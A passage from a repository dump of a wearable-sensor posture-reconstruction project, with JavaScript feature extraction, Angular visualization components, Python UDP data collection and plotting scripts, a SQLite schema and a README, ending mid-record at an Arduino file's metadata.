getKeyFreqMag(getFFTPhasors(left_gyro_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_gyro_z_FFT = getKeyFreqMag(getFFTPhasors(left_gyro_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_acc_x_FFT = getKeyFreqMag(getFFTPhasors(left_acc_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_acc_y_FFT = getKeyFreqMag(getFFTPhasors(left_acc_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_acc_z_FFT = getKeyFreqMag(getFFTPhasors(left_acc_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_acc_mag_FFT = getKeyFreqMag(getFFTPhasors(left_acc_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_gyro_mag_FFT = getKeyFreqMag(getFFTPhasors(left_gyro_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_gyro_x_FFT = getKeyFreqMag(getFFTPhasors(right_gyro_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_gyro_y_FFT = getKeyFreqMag(getFFTPhasors(right_gyro_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_gyro_z_FFT = getKeyFreqMag(getFFTPhasors(right_gyro_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_acc_x_FFT = getKeyFreqMag(getFFTPhasors(right_acc_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_acc_y_FFT = getKeyFreqMag(getFFTPhasors(right_acc_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_acc_z_FFT = getKeyFreqMag(getFFTPhasors(right_acc_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_acc_mag_FFT = getKeyFreqMag(getFFTPhasors(right_acc_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_gyro_mag_FFT = getKeyFreqMag(getFFTPhasors(right_gyro_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n\n\n var features = mean.concat(variance, median,\n torso_gyro_x_FFT,\n torso_gyro_y_FFT,\n torso_gyro_z_FFT,\n torso_acc_x_FFT,\n torso_acc_y_FFT,\n torso_acc_z_FFT,\n torso_acc_mag_FFT,\n torso_gyro_mag_FFT,\n head_gyro_x_FFT,\n head_gyro_y_FFT,\n head_gyro_z_FFT,\n head_acc_x_FFT,\n head_acc_y_FFT,\n head_acc_z_FFT,\n head_acc_mag_FFT,\n head_gyro_mag_FFT,\n left_gyro_x_FFT,\n left_gyro_y_FFT,\n left_gyro_z_FFT,\n left_acc_x_FFT,\n left_acc_y_FFT,\n left_acc_z_FFT,\n left_acc_mag_FFT,\n left_gyro_mag_FFT,\n right_gyro_x_FFT,\n right_gyro_y_FFT,\n right_gyro_z_FFT,\n right_acc_x_FFT,\n right_acc_y_FFT,\n right_acc_z_FFT,\n right_acc_mag_FFT,\n right_gyro_mag_FFT\n )\n\n // var phasors = getFFTPhasors(torso_gyro_x.slice(0, config.WINDOW_SIZE))\n // var fftMag = getKeyFreqMag(phasors, this.SAMPLE_RATE)\n // console.log(`fftMag: ${JSON.stringify(fftMag)}`)\n // console.log(features)\n // console.log(features.length)\n\n return features\n })\n\n var torsoHist = preprocessedDataDb.all(`\n SELECT\n round(torso_yaw/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS yaw_floor,\n round(torso_pitch/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS pitch_floor,\n round(torso_roll/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS roll_floor,\n count(*) AS count\n FROM Preprocessed100HZData\n WHERE interpolated_fixed_rate_time >= ${jobNum} AND interpolated_fixed_rate_time < ${jobNum + config.FEATURE_LENGTH}\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3`)\n .then(processHistGen(-180, 180, -90, 90, -180, 180))\n\n var headRelativeHist = preprocessedDataDb.all(`\n SELECT\n round(head_relative_yaw/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS yaw_floor,\n round(head_relative_pitch/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS pitch_floor,\n round(head_relative_roll/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS roll_floor,\n 
count(*) AS count\n FROM Preprocessed100HZData\n WHERE interpolated_fixed_rate_time >= ${jobNum} AND interpolated_fixed_rate_time < ${jobNum + config.FEATURE_LENGTH} AND head_relative_yaw <= 90 AND head_relative_yaw >= -90 AND head_relative_roll < 45 AND head_relative_roll >= -45\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3`)\n .then(processHistGen(-90, 90, -90, 90, -45, 45))\n\n var leftRelativeHist = preprocessedDataDb.all(`\n SELECT\n round(left_relative_yaw/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS yaw_floor,\n round(left_relative_pitch/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS pitch_floor,\n round(left_relative_roll/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS roll_floor,\n count(*) AS count\n FROM Preprocessed100HZData\n WHERE interpolated_fixed_rate_time >= ${jobNum} AND interpolated_fixed_rate_time < ${jobNum + config.FEATURE_LENGTH}\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3`)\n .then(processHistGen(-180, 180, -90, 90, -180, 180))\n\n var rightRelativeHist = preprocessedDataDb.all(`\n SELECT\n round(right_relative_yaw/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS yaw_floor,\n round(right_relative_pitch/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS pitch_floor,\n round(right_relative_roll/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS roll_floor,\n count(*) AS count\n FROM Preprocessed100HZData\n WHERE interpolated_fixed_rate_time >= ${jobNum} AND interpolated_fixed_rate_time < ${jobNum + config.FEATURE_LENGTH}\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3`)\n .then(processHistGen(-180, 180, -90, 90, -180, 180))\n var features = []\n var hasNull = false\n Promise.map([[jobNum], rawDataProcess, torsoHist, headRelativeHist, leftRelativeHist, rightRelativeHist], feat => {\n if (feat === null) {\n hasNull = true\n }\n if (!hasNull) {\n features = features.concat(feat)\n }\n })\n .then(() => {\n if (hasNull) {\n process.send({'event': 'ready', id: process.pid})\n } else {\n process.send({'event': 'newRow', id: process.pid, feature: features})\n }\n })\n }\n function getRawDataQuery(jobNum) {\n return `SELECT * FROM Preprocessed100HZData WHERE interpolated_fixed_rate_time >= ${jobNum} AND interpolated_fixed_rate_time < ${jobNum + config.FEATURE_LENGTH}`\n }\n}\n\nfunction masterProcess () {\n console.log(`Master ${process.pid} is running`)\n var wstream = fs.createWriteStream(config.FEATURE_OUTPUT);\n var preprocessedDataDb\n var startTime\n var endTime\n var iterator\n var workers = {}\n function handleWorkerMsg(msg) {\n console.log(`master receive worker msg: ${JSON.stringify(msg.event)}`)\n switch (msg.event) {\n case 'newRow':\n wstream.write(`${msg.feature.join(',')}\\n`)\n case 'ready':\n var jobNum = iterator.next()\n if (jobNum) {\n workers[msg.id].send({event: 'job', jobNum: jobNum})\n } else {\n workers[msg.id].send({event: 'fin'})\n delete workers[msg.id]\n if (Object.keys(workers).length === 0) {\n wstream.end()\n }\n }\n break\n\n }\n }\n dbConnect()\n .then(db => {\n preprocessedDataDb = db\n })\n .then(() => {\n return preprocessedDataDb.all(`SELECT MIN(interpolated_fixed_rate_time) FROM Preprocessed100HZData`)\n })\n .then(minTimestamp => {\n startTime = minTimestamp[0]['MIN(interpolated_fixed_rate_time)']\n return preprocessedDataDb.all(`SELECT MAX(interpolated_fixed_rate_time) FROM Preprocessed100HZData`)\n })\n .then(maxTimestamp => {\n endTime = maxTimestamp[0]['MAX(interpolated_fixed_rate_time)']\n console.log(startTime)\n console.log(endTime)\n iterator = new Iterator(startTime, endTime, 
config.FEATURE_LENGTH / 2)\n for (let i = 1; i < numCPUs; i++) {\n console.log(`Forking process number ${i}...`)\n var worker = cluster.fork()\n workers[worker.process.pid] = worker\n worker.on('message', handleWorkerMsg)\n }\n })\n\n function Iterator(min, max, step) {\n this.min = min - step\n this.max = max\n this.step = step\n this.cur = this.min\n this.next = function() {\n var ans\n this.cur += this.step\n if (this.cur <= this.max) {\n ans = this.cur\n } else {\n ans = null\n }\n return ans\n }\n }\n}\n\n\n\nfunction dbConnect() {\n return db.open(config.PROCESSED_DATA_PATH, {Promise})\n}\n\n"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.6800000071525574,
"avg_line_length": 25,
"blob_id": "30e05f63e00745f0318db964ef70d7804d00a70d",
"content_id": "942575b7676d9c0e4d9e8f17d36ccfb6f63c2017",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 650,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 25,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/middle-map/middle-map.component.spec.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { async, ComponentFixture, TestBed } from '@angular/core/testing';\n\nimport { MiddleMapComponent } from './middle-map.component';\n\ndescribe('MiddleMapComponent', () => {\n let component: MiddleMapComponent;\n let fixture: ComponentFixture<MiddleMapComponent>;\n\n beforeEach(async(() => {\n TestBed.configureTestingModule({\n declarations: [ MiddleMapComponent ]\n })\n .compileComponents();\n }));\n\n beforeEach(() => {\n fixture = TestBed.createComponent(MiddleMapComponent);\n component = fixture.componentInstance;\n fixture.detectChanges();\n });\n\n it('should create', () => {\n expect(component).toBeTruthy();\n });\n});\n"
},
{
"alpha_fraction": 0.5410000085830688,
"alphanum_fraction": 0.5835000276565552,
"avg_line_length": 27.571428298950195,
"blob_id": "82e0ee3c956019a058266e81708d2f38b6f4a6c5",
"content_id": "1d17142e449e66b30a24d2bd7112dec225ed00d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2000,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 70,
"path": "/data_collection.py",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import socket\nimport subprocess\nimport threading\nfrom datetime import datetime\n'''\nUDP_IP = \"192.168.4.3\"\nUDP_PORT = 8080\nMESSAGE = \"Hello, World\"\n\nsock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock2.bind((\"192.168.4.4\", 8080))\n'''\nIPs = []\nfiles = []\npipe = subprocess.Popen(\"arp -a|grep ESP\", shell=True, stdout=subprocess.PIPE)\ntext = pipe.stdout.read().decode(\"utf-8\")\n\n\nclass Receiver(threading.Thread):\n def run(self, UDP_IP, UDP_PORT, f):\n while True:\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind((UDP_IP, UDP_PORT))\n data, addr = sock.recvfrom(1024)\n f.write(data)\n \n\nlines = text.split('\\n') ;\nfor line in lines:\n if len(line) > 0:\n l = line.split(' ')\n #name = l[0].decode(\"unicode-escape\")\n ip = l[1].encode('ascii', 'ignore')[1:-1]\n if True:\n IPs.append(ip)\n\nFiles = [None for i in range(0, len(IPs))]\nPorts = [None for i in range(0, len(IPs))]\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind((\"192.168.4.1\", 8080))\nprint(IPs)\n\nchannels = []\nwhile n < len(IPs):\n data, addr = sock.recvfrom(1024);\n if addr[0] in IPs:\n channel = data.split(',')[1]\n if channel not in channels:\n ind = IPs.index(addr[0])\n Files[ind] = open(channel + \".csv\", 'w')\n #subprocess.Popen(\"mkfifo pipe\" + channel, shell=True)\n #Files[ind] = open(\"pipe\" + channel, 'w')\n \n\nprint(len(channels))\nwhile True:\n data, addr = sock.recvfrom(1024);\n print(data)\n try:\n channel = data.split(',')[1]\n except ValueError:\n continue\n #data = data.split(',')\n #data[0] = str(int(data[0])*3.1415926/180)\n timelist = datetime.now().strftime(\"%H:%M:%S.%f\").split(':')\n t = str(int(timelist[0])*3600 + int(timelist[1])*60 + float(timelist[2]))\n Files[ind].write(data + ',' + t + '\\n')\n Files[ind].flush()\n"
},
{
"alpha_fraction": 0.6444207429885864,
"alphanum_fraction": 0.6529631614685059,
"avg_line_length": 25.380281448364258,
"blob_id": "5f7edc86568cbc3d8ba9f5e546f8bb4ccd647f4e",
"content_id": "b15e0744e33c075263f146e562235a5c760e3c6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 1873,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 71,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/right-legend/right-legend.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\nimport { SockService } from '../../services/sock.service';\nimport { DataModelService } from '../../services/data-model.service';\n@Component({\n selector: 'app-right-legend',\n templateUrl: './right-legend.component.html',\n styleUrls: ['./right-legend.component.css']\n})\nexport class RightLegendComponent implements OnInit {\n status;\n colorPalette;\n constructor(private dataModel: DataModelService, private sock: SockService) {\n this.status = dataModel.status;\n this.colorPalette = dataModel.colorPalette;\n }\n\n ngOnInit() {\n }\n\n public objToArray(obj) {\n return Object.keys(obj);\n }\n\n public selectCluster(option) {\n this.status.selectedCluster = option;\n if (! this.dataModel.clusterData[option]) {\n this.sock.getClusterData(option);\n }\n }\n getKeys(obj) {\n return Object.keys(obj);\n }\n\n getStyle(cluster_id) {\n\n }\n\n getColor(cluster_id) {\n var color = ['rgb(', this.dataModel.colorPalette[cluster_id].join(','), ')'].join('')\n var white = 'rgb(255, 255, 255)'\n var ans\n if (this.status.clustersOnOff[cluster_id]) {\n ans = color\n } else {\n ans = white\n }\n return {\n 'background-color': ans,\n 'border-style': 'solid',\n 'border-width': '3px',\n 'border-color': color,\n 'border-radius': '10px',\n 'width': '80%',\n 'height': '30px',\n 'text-align': 'center'\n }\n }\n\n toggleClusterOnoff(cluster_id) {\n console.log(this.status.clustersOnOff)\n console.log(cluster_id)\n console.log( this.status.clustersOnOff[cluster_id])\n this.status.clustersOnOff[cluster_id] = !this.status.clustersOnOff[cluster_id]\n this.dataModel.updateDisplayClusterData()\n }\n\n // public getClusters() {\n // return Object.keys(this.dataModel.clusterData[this.status.availableClusters[this.status.selectedCluster]])\n // }\n\n}\n"
},
{
"alpha_fraction": 0.743834912776947,
"alphanum_fraction": 0.7468545436859131,
"avg_line_length": 39.551021575927734,
"blob_id": "9964894ad02998e267f1df394c4d7a00c577f3c6",
"content_id": "27155c0ea01b08a73ed6ef7164d5cdf5b8218687",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 1987,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 49,
"path": "/oriTrakHAR-master/rawDataVis/src/app/app.module.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { BrowserModule } from '@angular/platform-browser';\nimport { NgModule } from '@angular/core';\nimport { CommonModule } from '@angular/common';\n\nimport { AppComponent } from './app.component';\nimport { DataModelService } from './services/data-model.service';\nimport { SocketIoModule, SocketIoConfig } from './modules/ng2-socket-io';\nimport { SockService } from './services/sock.service';\nimport { wsAddr } from './serverAddr';\nimport { StickFigureComponent } from './components/stick-figure/stick-figure.component';\nimport { BsDropdownModule } from 'ngx-bootstrap';\nimport { AlertModule } from 'ngx-bootstrap';\nimport { TimepickerModule } from 'ngx-bootstrap/timepicker';\nimport { FormsModule } from '@angular/forms';\nimport { ShpereHistComponent } from './components/shpere-hist/shpere-hist.component';\nimport { Left3dVisComponent } from './components/left-3d-vis/left-3d-vis.component';\nimport { TopNavBarComponent } from './components/top-nav-bar/top-nav-bar.component';\nimport { BottomTimeLineComponent } from './components/bottom-time-line/bottom-time-line.component';\nimport { NouisliderModule } from 'ng2-nouislider';\nimport { MiddleMapComponent } from './components/middle-map/middle-map.component';\nimport { RightLegendComponent } from './components/right-legend/right-legend.component';\nimport { AngularOpenlayersModule } from 'ngx-openlayers';\nconst config: SocketIoConfig = { url: wsAddr, options: {} };\n\n@NgModule({\n declarations: [\n AppComponent,\n StickFigureComponent,\n ShpereHistComponent,\n Left3dVisComponent,\n TopNavBarComponent,\n BottomTimeLineComponent,\n MiddleMapComponent,\n RightLegendComponent\n ],\n imports: [\n BrowserModule,\n FormsModule,\n NouisliderModule,\n SocketIoModule.forRoot(config),\n BsDropdownModule.forRoot(),\n AlertModule.forRoot(),\n TimepickerModule.forRoot(),\n AngularOpenlayersModule\n ],\n providers: [SockService, DataModelService],\n bootstrap: [AppComponent]\n})\nexport class AppModule { }\n"
},
{
"alpha_fraction": 0.7882069945335388,
"alphanum_fraction": 0.7882069945335388,
"avg_line_length": 42.73684310913086,
"blob_id": "71127ceeab0e2a3c074a55987f5834d7bfab4155",
"content_id": "8204ddd655ac88cd6111dfc2395ca1a6912975b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 831,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 19,
"path": "/README.md",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "# Posture-Reconstruction\n## oriTrakHAR-master\nYuhui's project\n## python-code\nPython code translated from oriTrakHAR-master:\n#### *left and right Dict_yzx*: \nDictionary in json mapping wrist euler to elbow euler\n#### *processData.processRow(files, timeSeries)*: \nRead quaternions from files, interpolated at times specified by timeSeries\n#### *processStream.processRow(files, timeSeries)*: \nRead quaternions from named pipes, interpolated at times specified by timeSeries\n#### *visualization*:\nVisualize quaternions loaded from either files or pipes, determined by the source of processRow\n#### *transformations*:\nUtility functions for handling quaternions\n## data_collection:\nReceive data from WiFi modules and save as csv files\n## hotspot_to_client:\nSwitch rpi between WiFi hotspot and client; Need a reboot to make those changes\n"
},
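The README above names `processData.processRow(files, timeSeries)` without showing a call site. A minimal usage sketch follows; the file names, the 100 Hz time base, and the assumption that it yields the same six-element tuples as `processStream.processRow` (shown later in this listing) are illustrative, not taken from the repository:

```python
# Hypothetical driver for processData.processRow as described in the README.
import numpy as np
import processData

files = ['torso.csv', 'head.csv', 'left.csv', 'right.csv']  # one file per sensor (assumed names)
timeSeries = np.linspace(0.0, 10.0, 1001)                   # 10 s sampled at ~100 Hz

# Assumed to yield one tuple of interpolated, torso-relative quaternions
# and accelerations per time step, mirroring processStream.processRow.
for head_q, left_q, right_q, head_acc, left_acc, right_acc in processData.processRow(files, timeSeries):
    pass  # e.g. feed the relative quaternions to the visualization module
```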
{
"alpha_fraction": 0.6531772613525391,
"alphanum_fraction": 0.6732441186904907,
"avg_line_length": 47.209678649902344,
"blob_id": "5685b815ee5d214ee41a021d9cd8741d39b419dc",
"content_id": "5cb237e9aa6712c18785ddb4aad6b6e8650af3ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 2990,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 62,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer/dbInit.sql",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "CREATE TABLE IF NOT EXISTS SensorData100Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n server_send_timestamp INTEGER NOT NULL,\n sensor_synced_timestamp INTEGER NOT NULL,\n sensor_raw_timestamp INTEGER NOT NULL,\n quat_w REAL NOT NULL,\n quat_x REAL NOT NULL,\n quat_y REAL NOT NULL,\n quat_z REAL NOT NULL,\n gyro_x REAL NOT NULL,\n gyro_y REAL NOT NULL,\n gyro_z REAL NOT NULL,\n acc_x REAL NOT NULL,\n acc_y REAL NOT NULL,\n acc_z REAL NOT NULL\n);\nCREATE TABLE IF NOT EXISTS SensorData20Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n server_send_timestamp INTEGER NOT NULL,\n sensor_synced_timestamp INTEGER NOT NULL,\n sensor_raw_timestamp INTEGER NOT NULL,\n magn_x REAL NOT NULL,\n magn_y REAL NOT NULL,\n magn_z REAL NOT NULL\n);\n\nCREATE TABLE IF NOT EXISTS SensorMessage(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n server_send_timestamp INTEGER NOT NULL,\n client_recv_timestamp INTEGER NOT NULL,\n client_send_timestamp INTEGER NOT NULL,\n server_recv_timestamp INTEGER NOT NULL,\n num_100hz_data INTEGER NOT NULL,\n num_20hz_data INTEGER NOT NULL\n);\n\nCREATE INDEX IF NOT EXISTS sensor_synced_timestamp_100 ON SensorData100Hz(sensor_synced_timestamp);\nCREATE INDEX IF NOT EXISTS server_send_timestamp_100 ON SensorData100Hz(server_send_timestamp);\nCREATE INDEX IF NOT EXISTS sensor_raw_timestamp_100 ON SensorData100Hz(sensor_raw_timestamp);\nCREATE INDEX IF NOT EXISTS id_100 ON SensorData100Hz(sensor_id, server_id);\n\nCREATE INDEX IF NOT EXISTS sensor_synced_timestamp_20 ON SensorData20Hz(sensor_synced_timestamp);\nCREATE INDEX IF NOT EXISTS server_send_timestamp_20 ON SensorData20Hz(server_send_timestamp);\nCREATE INDEX IF NOT EXISTS sensor_raw_timestamp_20 ON SensorData20Hz(sensor_raw_timestamp);\nCREATE INDEX IF NOT EXISTS id_20 ON SensorData20Hz(sensor_id, server_id);\n\nCREATE INDEX IF NOT EXISTS id_sensor_message ON SensorMessage(sensor_id, server_id);\nCREATE INDEX IF NOT EXISTS server_send_sensor_message ON SensorMessage(server_send_timestamp);\nCREATE INDEX IF NOT EXISTS client_recv_sensor_message ON SensorMessage(client_recv_timestamp);\nCREATE INDEX IF NOT EXISTS client_send_sensor_message ON SensorMessage(client_send_timestamp);\nCREATE INDEX IF NOT EXISTS server_recv_sensor_message ON SensorMessage(server_recv_timestamp);\n\nCREATE VIEW IF NOT EXISTS NUM_DATA AS\nSELECT server_id, sensor_id, SUM(num_100hz_data) AS num_data_100hz, SUM(num_20hz_data) AS num_data_20hz\nFROM SensorMessage\nGROUP BY server_id, sensor_id;\n\n"
},
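Because every statement in dbInit.sql is guarded with `IF NOT EXISTS`, the script is idempotent and can be re-run safely. One way to apply it, sketched with Python's standard library (the database file name is an assumption):

```python
# Sketch: initialize the collection database from dbInit.sql.
# 'sensor_data.db' is an assumed file name, not taken from the repo.
import sqlite3

with open('dbInit.sql') as f:
    script = f.read()

conn = sqlite3.connect('sensor_data.db')
with conn:
    conn.executescript(script)  # creates the tables, indexes, and the NUM_DATA view
conn.close()
```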
{
"alpha_fraction": 0.41417911648750305,
"alphanum_fraction": 0.45895522832870483,
"avg_line_length": 18.14285659790039,
"blob_id": "4812104555d15f652f7747514928710513e9a3c3",
"content_id": "52e2c36a2020abc7ae5f247d0e2e3aed19e945f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 536,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 28,
"path": "/oriTrakHAR-master/robotVisualizationRealtime/src/app/services/data-model.service.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Injectable } from '@angular/core';\n\n@Injectable()\nexport class DataModelService {\n public status = {\n torso : {\n quaternion: {w: 1, x: 0, y: 0, z: 0}\n },\n head: {\n quaternion: {w: 1, x: 0, y: 0, z: 0}\n },\n rightUpper: {\n quaternion: {w: 1, x: 0, y: 0, z: 0}\n },\n rightLower: {\n quaternion: {w: 1, x: 0, y: 0, z: 0}\n },\n leftUpper: {\n quaternion: {w: 1, x: 0, y: 0, z: 0}\n },\n leftLower: {\n quaternion: {w: 1, x: 0, y: 0, z: 0}\n }\n };\n\n constructor() { }\n\n}\n"
},
{
"alpha_fraction": 0.43861672282218933,
"alphanum_fraction": 0.5025936365127563,
"avg_line_length": 26.645160675048828,
"blob_id": "ac3236ef51e3151d11913ef0612b63e0959b0f2b",
"content_id": "b2bc8c570ac43af1e547f42f24a07a765a4d5683",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1735,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 62,
"path": "/visualize_clock.py",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport numpy as np\n\ndef millis(time):\n timelist = time.split(':')\n t = int(timelist[0])*3600000+int(timelist[1])*60000+float(timelist[2])*1000\n if int(timelist[0]) < 5:\n t += 24*3600000\n return t\ninterval = 10000\n'''\nwith open('9008.csv') as f:\n l = f.readline();\n strlist = l.split(',')\n tw0 = int(strlist[-2])\n tpi0 = millis(strlist[-1])\n tw = int(strlist[-2]) + interval\n tpi = millis(strlist[-1]) + interval\n count1 = 0;\n count2 = 0;\n result1 = [];\n result2 = [];\n result3 = [];\n while l:\n strlist = l.split(',')\n if int(strlist[-2]) < tw:\n count1 += 1\n else:\n #print(count1)\n result1.append(count1)\n count1 = 0\n tw += interval\n if millis(strlist[-1]) < tpi:\n count2 += 1\n else:\n result2.append(count2)\n result3.append(millis(strlist[-1]) - tpi0 - int(strlist[-2]) + tw0)\n count2 = 0\n tpi += interval\n l = f.readline()\n'''\nn = 0\nwith open('9009.csv') as f:\n with open('9008.csv') as g:\n l1 = f.readline()\n l2 = g.readline()\n result = []\n while l1:\n n = n + 1\n if n%10 == 0:\n strlist1 = l1.split(',')\n strlist2 = l2.split(',')\n result.append(millis(strlist1[-1]) - millis(strlist2[-1]) - int(strlist1[-2]) + int(strlist2[-2]))\n l1 = f.readline()\n l2 = g.readline()\nresult = np.asarray(result)\n#result1 = np.asarray(result1)\n#result2 = np.asarray(result2)\n#result3 = np.asarray(result3)\nt = np.arange(0.0, len(result), 1)\nplt.plot(t, result)\nplt.show()\n\n \n\n\n \n"
},
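The `millis` helper above folds timestamps with an hour below 5 onto the next day, so a recording that crosses midnight still produces increasing values. A quick self-contained check of that behaviour (the timestamps are illustrative, not from the data set):

```python
def millis(time):
    # 'HH:MM:SS.fff' -> milliseconds; hours before 05:00 belong to the next day.
    h, m, s = time.split(':')
    t = int(h) * 3600000 + int(m) * 60000 + float(s) * 1000
    if int(h) < 5:
        t += 24 * 3600000
    return t

# 23:00 -> 01:00 spans midnight but still yields a positive 2 h difference.
assert millis('01:00:00.000') - millis('23:00:00.000') == 2 * 3600000
```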
{
"alpha_fraction": 0.6513410210609436,
"alphanum_fraction": 0.6538952589035034,
"avg_line_length": 26.964284896850586,
"blob_id": "58abc129a38247e7acdf6629d219975ddeba002c",
"content_id": "db091b123ef16e1378e5c94b624c42799db5cef4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 783,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 28,
"path": "/oriTrakHAR-master/robotVisualizationRealtime/src/app/services/sock.service.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Injectable } from '@angular/core';\nimport { Socket } from '../modules/ng2-socket-io';\nimport { DataModelService } from './data-model.service';\n// import { AngleData } from '../prototypes';\n\n@Injectable()\nexport class SockService {\n\n constructor(private socket: Socket, private dataModel: DataModelService) {\n const self = this;\n var counter = 0\n\n socket.on('connect', (msg) => {\n console.log('on connect');\n });\n socket.on('newData', newDataHandle);\n\n function newDataHandle(msg) {\n // console.log(msg)\n dataModel.status[msg.id].quaternion.w = msg.quat.w\n dataModel.status[msg.id].quaternion.x = msg.quat.x\n dataModel.status[msg.id].quaternion.y = msg.quat.y\n dataModel.status[msg.id].quaternion.z = msg.quat.z\n }\n\n }\n\n}\n"
},
{
"alpha_fraction": 0.5985269546508789,
"alphanum_fraction": 0.652668297290802,
"avg_line_length": 25.686206817626953,
"blob_id": "d74b936112b44df3fa4e3b13f5397eb941e35cc3",
"content_id": "0b954997d8a310a8b00a05a2fdfaef47d5094249",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 7739,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 290,
"path": "/oriTrakHAR-master/sensorDataCollection/espBno055_streamming/espBno055_streamming.ino",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
